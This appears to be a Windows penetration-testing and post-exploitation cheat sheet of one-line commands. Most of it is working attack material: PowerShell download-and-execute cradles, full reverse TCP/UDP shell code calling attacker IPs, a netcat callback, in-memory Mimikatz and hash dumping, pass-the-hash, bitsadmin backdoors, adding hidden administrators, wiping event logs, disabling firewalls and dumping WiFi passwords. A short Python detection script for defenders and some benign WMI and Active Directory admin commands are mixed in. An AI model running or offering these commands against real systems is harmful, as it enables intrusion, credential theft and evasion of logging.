Windows Commands

Integrate Linux Commands into Windows with PowerShell and the Windows Subsystem for Linux

Collection Of Powershell Scripts with Framework for Pentesting
SHiPS based provider to navigate CIM classes and namespaces

Hidden WIFI backdoor:

netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<password> keyUsage=[persistent|temporary]
netsh wlan [start|stop] hostednetwork

Allow program/service/port through Firewall:

netsh firewall set service type = remotedesktop mode = enable
netsh firewall add allowedprogram C:\nltest.exe nltest enable
netsh firewall add portopening tcp 2482 lt enable all

Tunnel Traffic Natively with Windows:

netsh interface portproxy add v4tov4 listenport=80 connectaddress=[AttackerIP] connectport=80

List other shares:

net view \\fileserv /all

Powershell Downloader:

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"

Download and run program:

powershell (new-object System.Net.WebClient).DownloadFile('http://rmccurdy.com/scripts/quickvnc.exe','%TEMP%\quickvnc.exe');Start-Process "%TEMP%\quickvnc.exe"

Wipe Event logs:

powershell -command "wevtutil el | ForEach-Object { Write-Host \"Clearing $_\"; wevtutil cl \"$_\" }"

Get external IP:

powershell -command "(Resolve-DnsName -Name myip.opendns.com -Server 208.67.222.220).IPAddress"

Bitsadmin Download/Exec

Make the backdoor:

bitsadmin /create backdoor
bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe
bitsadmin /SETMINRETRYDELAY backdoor 88000
bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL

Check the backdoor is set up correctly:

bitsadmin /getnotifycmdline backdoor
bitsadmin /listfiles backdoor

Run the backdoor:

bitsadmin /RESUME backdoor

WMI Commands

Spot odd executables:
wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath

Look at services that are set to start automatically:
wmic SERVICE WHERE StartMode="Auto" GET Name, State

Find user-created shares (usually not hidden):
wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path

Find what starts on boot:
wmic STARTUP GET Caption, Command, User

Identify any local system accounts that are enabled (guest, etc.):
wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name

Change the start mode of a service:
wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled

Number of logons per user ID:
wmic netlogin where (name like "%skodo") get numberoflogons

Obtain a certain kind of event from the event log:
wmic ntevent where (message like "%logon%") list brief

Clear the event log (Security example):
wmic nteventlog where (description like "%secevent%") call cleareventlog

Get MAC address:
wmic nic get macaddress

Reboot or shutdown:
wmic os where buildnumber="2600" call reboot

Update static IP address:
wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")

Change network gateway:
wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)

Enable DHCP:
wmic nicconfig where index=9 call enabledhcp

Service management:
wmic service where caption="DHCP Client" call changestartmode "Disabled"

Start an application:
wmic process call create "calc.exe"

Terminate an application:
wmic process where name="calc.exe" call terminate

Change process priority:
wmic process where name="explorer.exe" call setpriority 64

Get list of process identifiers:
wmic process where (Name='svchost.exe') get name,processid

Information about hard drives:
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber

Information about the OS:
wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:\osinfo.htm

Information about files:
wmic path cim_datafile where "Path='\\windows\\system32\\wbem\\' and FileSize>1784088" > c:\wbemfiles.txt

Process list:
wmic process get /format:htable > c:\process.htm

Retrieve list of warning and error events not from the System or Security logs:
WMIC NTEVENT WHERE "EventType<3 AND LogFile != 'System' AND LogFile != 'Security'" GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:"htable.xsl":" datatype = number":" sortby = EventType" > c:\appevent.htm

Total hard drive space check:
wmic LOGICALDISK LIST BRIEF

Get running services information:
wmic service where (state="running") get caption, name, startmode, state

Get start mode of services:
wmic service get caption, name, startmode, state

Get domain names and when account passwords are set to expire:
WMIC UserAccount GET name,PasswordExpires /Value

Get hotfix and security patch information:
WMIC QFE GET /format:CSV > QFE.CSV

Get startup list:
wmic startup list full

Find a specific process:
wmic process list brief | find "cmd.exe"

Get list of IP interfaces:
wmic nicconfig where IPEnabled='true'

Change IP address:
wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0")

OS/system report, HTML formatted:
wmic /output:c:\os.html os get /format:hform

Products/programs installed report, HTML formatted:
wmic /output:c:\product.html product get /format:hform

Services report on a remote machine, HTML formatted:
wmic /output:c:\services.htm /node:server1 service list full /format:htable

Turn on Remote Desktop remotely:
wmic /node:"servername" /user:"user@domain" /password:"password" RDToggle where ServerName="server name" call SetAllowTSConnections 1

Get server drive space usage remotely (written for use inside a batch for loop, hence %%A):
WMIC /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv | MORE /E +2 >> SRVSPACE.CSV

Get PC serial number:
wmic /node:"HOST" bios get serialnumber

Get PC product number:
wmic /node:"HOST" baseboard get product

Search for Stored Credentials

Metasploit Framework enum_unattend module and gather credentials module:

type c:\sysprep.inf
type c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

Search text, XML and INI files recursively for "pass" (run from C:\):
findstr /S pass *.txt *.xml *.ini

Find out what groups a user is part of:
net user <userName> /domain | find "Group"

Users and Permissions

Add a user on windows:
net user $username $password /add

Add a user to the “Remote Desktop Users” group:
net localgroup "Remote Desktop Users" $username /add

Make a user an administrator:
net localgroup administrators $username /add

Network

Disable Windows firewall on newer versions:
NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows:
netsh firewall set opmode disable

Port forwarding to remote host:

netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>

Wireless Backdoor Creation:

netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=[persistent|temporary]
netsh wlan [start|stop] hostednetwork

Dump DNS Zones:

Get-DnsRecord -RecordType A -ZoneName FQDN -Server ServerName | % { Add-Content -Value $_ -Path filename.txt }
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_AType WHERE ContainerName='domain.com'"

Pass the Hash Windows

pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe

Everything after the % is the password field; here it carries the LM:NT hash pair instead of a password.
"aad3b435b51404eeaad3b435b51404ee" is the blank LM hash.

Pass the Hash
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE alice@localhost

Exec commands on remote Windows machine
PsExec.exe \\10.11.1.49 -u alice -p somepasswd cmd

get a file from Kali to the remote Windows machine
TFTP.EXE -i 10.11.1.49 get PsExec64.exe

Remote port forwarding from Windows -> Kali (the Kali host goes last; <KALI_IP> is a placeholder):
plink.exe -l root -pw Parolaroot -R 445:127.0.0.1:445 <KALI_IP>

Redirect port with plink.exe (makes the Windows machine's port 445 reachable on the Kali host's port 445, tunnelled over SSH on port 22):
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185

SYSINTERNALS

Use -accepteula to suppress the GUI prompt asking you to accept the EULA:
PsExec.exe -accepteula

PsExec64.exe -accepteula \\10.11.1.49 -u user -p somepassword cmd

powershell -ExecutionPolicy Bypass C:\Users\Public\PsExec.exe -accepteula \\localhost -u alice -p XXXX cmd

  • PsExec - execute processes remotely
  • PsFile - shows files opened remotely
  • PsGetSid - display the SID of a computer or a user
  • PsInfo - list information about a system
  • PsPing - measure network performance
  • PsKill - kill processes by name or process ID
  • PsList - list detailed information about processes
  • PsLoggedOn - see who’s logged on locally and via resource sharing (full source is included)
  • PsLogList - dump event log records
  • PsPasswd - changes account passwords
  • PsService - view and control services
  • PsShutdown - shuts down and optionally reboots a computer
  • PsSuspend - suspends processes
  • PsUptime - shows you how long a system has been running since its last reboot (PsUptime’s functionality has been incorporated into PsInfo)

Windows Persistence

Add Windows user:
net user /add hacker 1234567

Add user to Administrators groups
net localgroup administrators /add hacker

Add user to Remote Desktop user group
net localgroup "Remote Desktop users" hacker /add

Start Remote Desktop service
net start TermService

Is Remote Desktop Service running?
tasklist /svc | findstr /C:TermService

Permanently enable Terminal Services
sc config TermService start=auto

Enable Terminal Services through the registry (reboot afterwards):
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

DLL Injection

Run Custom DLL

rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll

Run CMD when disabled
rundll32 C:\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\cmd.dll

Run Regedit
rundll32 C:\regedit.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\regedit.dll

Inject DLL in to running process
Remote DLL Injector

RemoteDLLInjector64.exe <ProcessID> <DLL file>

Using Powersploit
Invoke-DLLInjection -ProcessID <ProcessID> -Dll <DLLfile>

Using Windows Exec
Mavinject32.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject64.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject.exe <PID> /INJECTRUNNING <DLL PATH>

InstallUtil.exe /U <DLL PATH>

UAC Bypass

Bypass with Windows Installer (Removed in Windows 10)
makecab C:\Some\Evil.dll C:\Some\Suspicious.cab
wusa C:\Some\Suspicious.cab /extract:C:\Windows\Some\Path

Bypass with IFileOperation COM Object

IFileOperation.MoveItem("C:\Some\Source.file", "C:\Some\Destination\Path\", "Destination.file")
IFileOperation.PerformOperations()

Binary Information

Which programs carry the autoElevate manifest flag:
Get-Content -Path C:\Windows\System32\Taskmgr.exe | Select-String -Pattern "autoElevate"

View all in a folder (Get-AutoElevate is not a built-in cmdlet; load the script that defines it first):
Get-AutoElevate -Path C:\Windows\system32 -MaxDepth 1

Domain Information

Finding the Domain Controller:
echo %LOGONSERVER%
nltest /dclist:<domain>
nslookup -q=srv _kerberos._tcp (the domain suffix can be left off; the DNS search suffix completes it)

Setting up a Domain Server

Install Active Directory:

Install-WindowsFeature -name AD-Domain-Services -IncludeManagementTools

Create a new Active Directory Domain:

Import-Module ADDSDeployment
# Initiate the new Active Directory:
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2012R2" `
    -DomainName "raymii.nl" -DomainNetbiosName "RAYMII" -ForestMode "Win2012R2" -InstallDns:$true `
    -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true

Add a server to a domain:

# First test the existing domain to make sure you can join:
Test-ADDSForestInstallation -DomainName raymii.nl
# Add the server to the domain as a backup domain controller:
Install-ADDSDomainController -InstallDns -Credential (Get-Credential RAYMII\Administrator) -DomainName raymii.nl

Create an Active Directory user account:

New-ADUser -Name "John Doe" -GivenName John -Surname Doe `
    -SamAccountName jdoe -UserPrincipalName jdoe@raymii.nl `
    -AccountPassword (Read-Host -AsSecureString "hunter2") `
    -PassThru | Enable-ADAccount

Create an Active Directory group:

# Create a new global group called "Managers" in the default Users container of Active Directory:
New-ADGroup -Name "Managers" -GroupScope Global
# If it needs to exist in a different path in Active Directory, specify the path by its distinguished name:
New-ADGroup -Name "Managers" -GroupScope Global -Path "OU=OtherOU,DC=Raymii,DC=nl"

Add user to a group:

# Add the user jdoe to the Managers group:
Add-ADGroupMember -Identity "Managers" -Members "jdoe"
# To add a user in one OU to a group in another OU, specify the full DNs:
Add-ADGroupMember -Identity "CN=SupportSlavesGroup,OU=SupportSlaves,DC=raymii,DC=nl" -Members "CN=jdoe,OU=OtherUserOU,DC=raymii,DC=nl"

Install Microsoft Exchange 2013:

# Install the RSAT-ADDS tools via PowerShell:
Install-WindowsFeature RSAT-ADDS
# Prepare the forest for the installation of Exchange. First the schema:
setup /ps /IAcceptExchangeServerLicenseTerms
# Then Active Directory:
setup /PrepareAD /OrganizationName:"Raymii" /IAcceptExchangeServerLicenseTerms
# Then the domain itself:
setup /pd /IAcceptExchangeServerLicenseTerms
# Install the other required components and features for Exchange:
Install-WindowsFeature AS-HTTP-Activation, Desktop-Experience, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation
# Download the following setups manually from the Microsoft website and install them in the order listed:
#   Unified Communications Managed API 4.0 Runtime
#   Microsoft Office 2010 Filter Pack 64 bit
#   Microsoft Office 2010 Filter Pack SP1 64 bit
# Start the actual Exchange installation:
setup /m:Install /Roles:ca,mb,mt /IAcceptExchangeServerLicenseTerms /InstallWindowsComponents /DBFilePath:"E:\EXCHANGE\MDB001.edb" /LogFolderPath:"E:\EXCHANGE" /MdbName:"MDB001"

WebDL and execute

powershell -ExecutionPolicy Bypass -NoLogo -Command "Import-Module BitsTransfer; Start-BitsTransfer http://www.illmob.org/test.exe test.exe; ./test.exe"
powershell -ExecutionPolicy Bypass -NoLogo -Command "(New-Object System.Net.WebClient).DownloadFile('http://illmob.org/test.exe','test.exe'); ./test.exe"
powershell -ExecutionPolicy Bypass -NoLogo -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')"

Reverse TCP Shell

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Reverse UDP Shell

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("192.168.1.100"),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

WebDL and execute mimikatz totally in memory

Uses Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory and dump credentials without ever writing the mimikatz binary to disk. Dump all domain creds with mimikatz:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Invoke-Mimikatz.cs.ps1 invokes x86 or x64 Mimikatz inside the PowerShell process:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/BD2toB'); Invoke-Mimikatz -DumpCreds"

WebDL and execute hashdump totally in memory

Hashes are dumped using a modified version of the powerdump script from MSF written by David Kennedy. Administrator privileges are required for this script.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/MHa1Bj'); Get-PassHashes"

WebDL and execute Get-VaultCredential totally in memory

Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically, are displayed in cleartext.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/57uScy'); Get-VaultCredential"

WebDL and execute LSA Secrets totally in memory

Extracts LSA secrets from HKLM:\SECURITY\Policy\Secrets\ on the local computer. The payload must be run with elevated permissions, in 32-bit mode, and requires permissions on the SECURITY key in HKLM. That permission can be obtained with the Enable-DuplicateToken payload.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/qhgsX1');"

Dump stored Autologon password

Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | select defaultusername,defaultpassword

Dump WIFI Passwords

$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
$exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}

(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

foreach($profil in (netsh wlan show profiles | Select-String ':')){foreach($line in (netsh wlan show profiles name=($profil.toString().split(':')[1].trim()) key=clear)){$line+';'}};

SID2USER

((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).Translate([System.Security.Principal.NTAccount])).Value

USERS2SID & Last Logon

gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto

Query Domain Admins

Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"

Query Process/Service

gps | ?{$_.name -match "<process/service name>"} | ?{$_.id -match "<process/service id>"} | select *

Query Drives

[System.IO.DriveInfo]::GetDrives()

WebInject callback

127.0.0.1 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://192.168.1.107/nc.exe', 'nc.exe')

Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:

127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21

Port Scan

PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null

Ping Sweep

PS C:\> 1..255 | % {echo "10.10.10.$_"; ping -n 1 -w 100 10.10.10.$_ | Select-String ttl}

Find Files

PS C:\> Get-ChildItem "C:\Users\" -Recurse -Include *passwords*.txt

Text 2 Speech

powershell (New-Object -ComObject Sapi.SpVoice).Speak(('All Your Base R Belong To Us.'))

Other Resources: Nishang Github

Download Cradles

from https://gist.github.com/HarmJ0y/bb48307ffa663256e239

# 1. normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# 2. PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# 3. hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# 4. Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# 5. WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# 6. using bitstransfer - touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# 7. DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
# 8. code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select-String -Pattern '"*"') -split '"'[0]))))

# 9. from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d

Using Microsoft's SyncAppvPublishingServer to download and execute a PowerShell file

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{}') | IEX"

Passing an MSI file URL to the Windows Installer will download and execute it

msiexec /i {}

Windows Remote Management provides the ability to remotely execute WMI commands

winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}

Uses certutil to download your base64-encoded DLL as a .txt file to avoid suspicion

certutil -urlcache -split -f {} google_https_cert.txt && certutil -decode google_https_cert.txt https_cert.dll && regsvr32 /s /u https_cert.dll

Uses certutil to download your exe file as a cert file to avoid suspicion

certutil.exe -urlcache -split -f {} google_https_cert.exe && google_https_cert.exe

Using the Windows Control Panel to load a DLL file

control.exe {your_dll_file}

Using the .NET compiler to compile a C# payload locally that can then be executed

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

Uses forfiles to execute commands without using cmd

forfiles /p c:\windows\system32 /m notepad.exe /c {Here_your_command}

Uses mshta to download and execute your HTA file

mshta {}

Using Microsoft Office Word to load a DLL file

winword /l {your_dll_file}

Using rundll32.exe to download and execute a PowerShell file

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{}');")
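Defender-side example, added here and not part of the cheat sheet: a small Python rule set that flags the living-off-the-land command lines collected above (certutil, regsvr32/scrobj.dll, rundll32 javascript:, SyncAppvPublishingServer, msiexec from a URL, bitsadmin notify command lines, netsh portproxy and hosted networks, RDP enablement via the registry, event log clearing, PowerShell download cradles) in process-creation telemetry. The event lines, host, user and the 198.51.100.7 address are constructed for the demo; `parse_event` assumes a simplified 4688-style "key=value" line with the command line last.

```python
"""Flag the living-off-the-land command lines above in process-creation logs.

Added example for defenders; it is not part of the cheat sheet. The events
below are constructed, simplified 4688-style lines (one per line, cmdline
last); adapt parse_event() to your real export.
"""
import re

# (rule name, pattern); each pattern mirrors a one-liner on this page.
RULES = [
    ("certutil_download",        r"certutil(\.exe)?\s.*-urlcache\b"),
    ("certutil_decode",          r"certutil(\.exe)?\s.*-decode\b"),
    ("mshta_remote",             r"mshta(\.exe)?\s+https?://"),
    ("regsvr32_squiblydoo",      r"regsvr32(\.exe)?\s.*/i:https?://.*scrobj\.dll"),
    ("rundll32_javascript",      r"rundll32(\.exe)?\s+javascript:"),
    ("syncappv_download",        r"SyncAppvPublishingServer(\.exe)?\s.*DownloadString"),
    ("msiexec_remote",           r"msiexec(\.exe)?\s.*/i\s+https?://"),
    ("bits_notify_cmdline",      r"bitsadmin(\.exe)?\s.*/SETNOTIFYCMDLINE\b"),
    ("netsh_portproxy",          r"netsh\s.*portproxy\s+add\b"),
    ("netsh_hostednetwork",      r"netsh\s+wlan\s+set\s+hostednetwork\b"),
    ("rdp_enabled_via_reg",      r"reg(\.exe)?\s+add\s.*Terminal Server.*fDenyTSConnections.*/d\s+0\b"),
    ("eventlog_clear",           r"wevtutil(\.exe)?\s+cl\b|cleareventlog"),
    ("powershell_cradle",        r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"),
    ("powershell_bypass_hidden", r"powershell.*(-ep\s+bypass|-exec\s+bypass|-ExecutionPolicy\s+Bypass|-w\s+hidden)"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]
# A script host spawned by an Office application is the classic phishing chain.
OFFICE_PARENT = re.compile(r"\\(winword|excel|powerpnt|outlook)\.exe$", re.IGNORECASE)

# Simplified event format (constructed): ts host=.. user=.. parent=<path> cmdline=<rest>
EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+"
    r"parent=(?P<parent>.*?)\s+cmdline=(?P<cmdline>.*)$"
)

# Constructed sample telemetry (RFC 5737 test address, made-up host and users).
SAMPLE_EVENTS = r"""
2024-05-01T09:12:03Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=certutil -urlcache -split -f http://198.51.100.7/c.txt c.txt
2024-05-01T09:12:05Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=certutil -hashfile C:\Temp\setup.msi SHA256
2024-05-01T09:13:40Z host=WS01 user=CORP\alice parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE cmdline=powershell -nop -w hidden -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://198.51.100.7/a'))"
2024-05-01T09:14:02Z host=WS01 user=CORP\WS01$ parent=C:\Windows\System32\services.exe cmdline=C:\Windows\System32\svchost.exe -k netsvcs
2024-05-01T09:15:11Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll
2024-05-01T09:16:30Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2024-05-01T09:17:02Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL
2024-05-01T09:18:45Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=4444 connectaddress=198.51.100.7
2024-05-01T09:19:59Z host=WS01 user=CORP\alice parent=C:\Windows\System32\cmd.exe cmdline=wevtutil cl Security
"""


def parse_event(line):
    """Return the event fields as a dict, or None for lines that do not parse."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in the command line, in rule order."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def scan(text):
    """Parse each line, keep the ones that hit a rule, and grade them."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if not ev:
            continue
        rules = match_rules(ev["cmdline"])
        if not rules:
            continue
        office_child = bool(OFFICE_PARENT.search(ev["parent"]))
        ev["rules"] = rules
        # Office parent or several techniques stacked in one command line: escalate.
        ev["severity"] = "high" if office_child or len(rules) > 1 else "medium"
        hits.append(ev)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h['ts']} {h['host']} {h['severity']:<6} {','.join(h['rules'])}: {h['cmdline']}")
```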

Search for vulnerable service privilege opportunities using a script from PowerTools

Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

PowerView and output locally to disk for beacon:

powershell -nop -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter -UserName <USERNAME> | Out-File -Encoding Ascii <USERNAME>.txt}"

PowerView user hunting, search by keyword:

powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Property samaccountname,description,title
powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Property samaccountname,description,title

Simple Web request:

powershell.exe -w hidden -command "$wc = New-Object System.Net.WebClient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'); $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.DownloadString('http://google.com/')"

List Chrome bookmarks with one line:

type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

List all unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Firewall

netsh advfirewall show state
netsh advfirewall show config
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Exploit" dir=in action=allow program="C:\exploit.exe" enable=yes
netsh firewall add portopening tcp 2482 lt enable all

Services

schtasks /query /fo LIST /v
tasklist /SVC
sc qc Spooler

Enable RDP

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Add Admin User

net user [username] [password] /add
net localgroup administrators [username] /add

Dump WIFI passwords to .xml

netsh wlan export profile key=clear

Dump WIFI SSID/Password oneliner

@echo off & for /f "tokens=1* delims=:" %a in ('netsh wlan show profiles') do (for /f "tokens=*" %c in ("%~b") do netsh wlan show profile name=%c key=clear) | findstr /c:"Key Content" /c:"SSID name"

OS Name and Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Transfer File from FTP

echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp

Transfer File from TFTP

tftp -i yourserver.com get yourfile.exe && start yourfile.exe

Transfer File with ADODB.Stream
